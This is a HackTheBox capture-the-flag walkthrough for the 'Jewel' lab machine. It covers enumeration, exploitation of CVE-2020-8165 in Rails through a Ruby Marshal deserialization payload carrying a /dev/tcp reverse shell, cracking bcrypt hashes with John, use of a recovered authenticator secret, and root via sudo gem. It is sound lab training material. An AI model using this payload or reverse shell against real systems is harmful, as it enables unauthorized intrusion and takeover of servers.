HackTheBox: (“Jewel”) — Walkthrough
Hi people :D
Today we’ll solve “Jewel” machine from HackTheBox, it’s a good machine but I faced some errors that forced me to take a simple hint, let’s get started
Enumeration
— — — — — — —
Start with Nmap ( as usual XD )
When I tried to use -A with Nmap it didn’t work for some reason, so I used -A -Pn
nmap -A -Pn 10.10.10.211
We have two ports ( 8000,8080 ) that an HTTP server works on them
Web Enumeration
— — — — — — — —
Let’s check port 8080 first
http://10.10.10.211:8080
We found a simple website with a signup and login function, so let’s make an account and login with it
Hmm, nothing interesting ☹
Let’s check port 8000
http://10.10.10.211:8000
It looks like the source code for Bl0G!
Click on Bl0G! > Initial commit > Gemfile
We found rails version (“5.2.2.1”)
After a lot of searching for exploit, I found CVE with a number (“CVE 2020–8165”)
After searching for a public exploit for this CVE, I found this GitHub repo
Just follow these steps in order :
git clone https://github.com/masahiro331/CVE-2020-8165.git
bundle install --path vendor/bundle
for me, I faced an error while installing this bundle because Gemfile contains ruby 2.6.3 but another version is installed on my kali
To fix this, simply edit Gemfile with the version of ruby you have
Now, continue with the installation process
sudo bundle exec rails db:migrate
We have finished the Run process
Now we move on to the exploitation process
Exploitation
— — — — — —
Again follow the exploitation part in the Github repo
bundle exec rails console
code = '`/bin/bash -c "bash >& /dev/tcp/{Your_IP}/4444 0>&1"`'
Here we only change ( touch /tmp/rce ) with our reverse shell
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
puts "Payload"
require 'uri'
puts URI.encode_www_form(payload: payload)
Finally, we get the payload ☺
User Flag
— — — —
Now, login with your account in 10.10.10.211:8080 then go to Profile > profile > Edit
Click on Update User and intercept the request with Burp then change the username parameter with your payload that you got from the exploitation process
We get an error but no problem, just refresh the page and we got a bill shell
Do some improvements to our shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
Then simply read user.txt file to get the flag
Root Flag
— — — —
Time to Privilege Escalation :D
upload LinPEAS to the machine and run it
Leave the script finishes its work then see the results, you will see two hashes at the end of the results
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
Nice, now try to crack these hashes with John
You need to gzip rockyou.txt.gz first then make a file and paste these hashes then run this command:
john {Hashes_File} -w=/usr/share/wordlists/rockyou.txt
John will successfully crack the hash and the result is spongebob ( unfortunately, I didn’t take a screenshot for the result )
Try this as a password for bill
He asks for a verification code, after some research I found .google_authenticator file that contains a secret code
Now we need to generate a verification code with this secret code, to make this you can install any authenticator app or add-ons for the browsers
I used firefox add-ons called Authenticator
To generate a code, click on the extension logo in the top right corner then click on Edit > New > Manual Entry and paste the secret code
We successfully generated a verification code but when you try it, this error may appear
I went to Official Jewel Discussion and found a comment to solve this error
So, set up a date and time-zone of your device as close to the machine using these commands:
timedatectl set-timezone Europe/London
sudo date --set {Machine_LocalTime}
Try again after these changes
It works :D
Now we see that we can use gem as a root, go to GTFOBins site to search for privilege escalation exploit with gem
We find this command, try it and we successfully get a root shell :D
Simply, cat root.txt and we rooted the machine
Thanks for your reading and I hope you love this writeup ❤
